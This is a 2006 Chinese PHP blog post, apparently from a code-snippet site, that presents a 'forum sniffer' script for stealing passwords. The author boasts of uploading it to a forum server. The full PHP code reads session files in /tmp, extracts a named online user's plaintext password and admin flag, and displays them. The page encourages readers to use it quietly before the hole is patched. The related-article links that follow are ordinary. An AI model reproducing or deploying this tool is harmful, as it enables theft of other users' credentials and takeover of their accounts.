一个查看session内容的函数


Posted in PHP onOctober 09, 2006

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
  return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
《PHP边学边教》(01.开篇――准备工作)
Dec 13 PHP
php中使用ExcelFileParser处理excel获得数据(可作批量导入到数据库使用)
Aug 21 PHP
yii框架源码分析之创建controller代码
Jun 28 PHP
php检测用户是否用手机(Mobile)访问网站的类
Jan 09 PHP
PHP中使用Imagick操作PSD文件实例
Jan 26 PHP
朋友网关于QQ相关的PHP代码(研究QQ的绝佳资料)
Jan 26 PHP
在Debian系统下配置LNMP的教程
Jul 09 PHP
JavaScript与HTML结合的基本使用方法整理
Oct 12 PHP
php简单解析mysqli查询结果的方法(2种方法)
Jun 29 PHP
PHP实现上传图片到数据库并显示输出的方法
May 31 PHP
php数组遍历类与用法示例
May 24 PHP
PHP中类与对象功能、用法实例解读
Mar 27 PHP
一个显示天气预报的程序
Oct 09 #PHP
web方式ftp
Oct 09 #PHP
php中文本数据翻页(留言本翻页)
Oct 09 #PHP
自己动手做一个SQL解释器
Oct 09 #PHP
GD输出汉字的函数的分析
Oct 09 #PHP
类的另类用法--数据的封装
Oct 09 #PHP
最小化数据传输――在客户端存储数据
Oct 09 #PHP
You might like
用PHP和ACCESS写聊天室(二)
2006/10/09 PHP
让你成为更出色的PHP开发者的10个技巧
2011/02/25 PHP
使用dump函数,给php加断点测试
2013/06/25 PHP
ThinkPHP的I方法使用详解
2014/06/18 PHP
浅谈php处理后端&amp;接口访问超时的解决方法
2016/10/29 PHP
PHP中迭代器的简单实现及Yii框架中的迭代器实现方法示例
2020/04/26 PHP
JavaScript While 循环基础教程
2007/04/05 Javascript
游览器中javascript的执行过程(图文)
2012/05/20 Javascript
自动刷新网页,自动刷新当前页面,JS调用
2013/06/24 Javascript
解析Jquery取得iframe中元素的几种方法
2013/07/04 Javascript
浅谈Javascript 执行顺序
2013/12/18 Javascript
JS获取浏览器语言动态加载JS文件示例代码
2014/10/31 Javascript
javascript中clone对象详解
2014/12/03 Javascript
后台获取ZTREE选中节点的方法
2015/02/12 Javascript
初步认识JavaScript函数库jQuery
2015/06/18 Javascript
jQuery焦点图切换特效代码分享
2015/09/15 Javascript
ES6数组的扩展详解
2017/04/25 Javascript
JavaScript实现二维坐标点排序效果
2017/07/18 Javascript
EasyUI创建人员树的实例代码
2017/09/15 Javascript
微信小程序之滚动视图容器的实现方法
2017/09/26 Javascript
python通过定义一个类实例作为ftp回调方法
2015/05/04 Python
详解Swift中属性的声明与作用
2016/06/30 Python
对python PLT中的image和skimage处理图片方法详解
2019/01/10 Python
关于Python 中的时间处理包datetime和arrow的方法详解
2020/03/19 Python
Django查询优化及ajax编码格式原理解析
2020/03/25 Python
Python使用Paramiko控制liunx第三方库
2020/05/20 Python
Python爬虫制作翻译程序的示例代码
2021/02/22 Python
大整数数相乘的问题
2012/07/22 面试题
迟到检讨书800字
2014/01/13 职场文书
委托书样本
2014/04/02 职场文书
自愿离婚协议书范文2014
2014/10/12 职场文书
2015年会计工作总结范文
2015/05/26 职场文书
机关单位2016年法制宣传日活动总结
2016/04/01 职场文书
openstack中的rpc远程调用的方法
2021/07/09 Python
Java设计模式之享元模式示例详解
2022/03/03 Java/Android
Java Spring Boot 正确读取配置文件中的属性的值
2022/04/20 Java/Android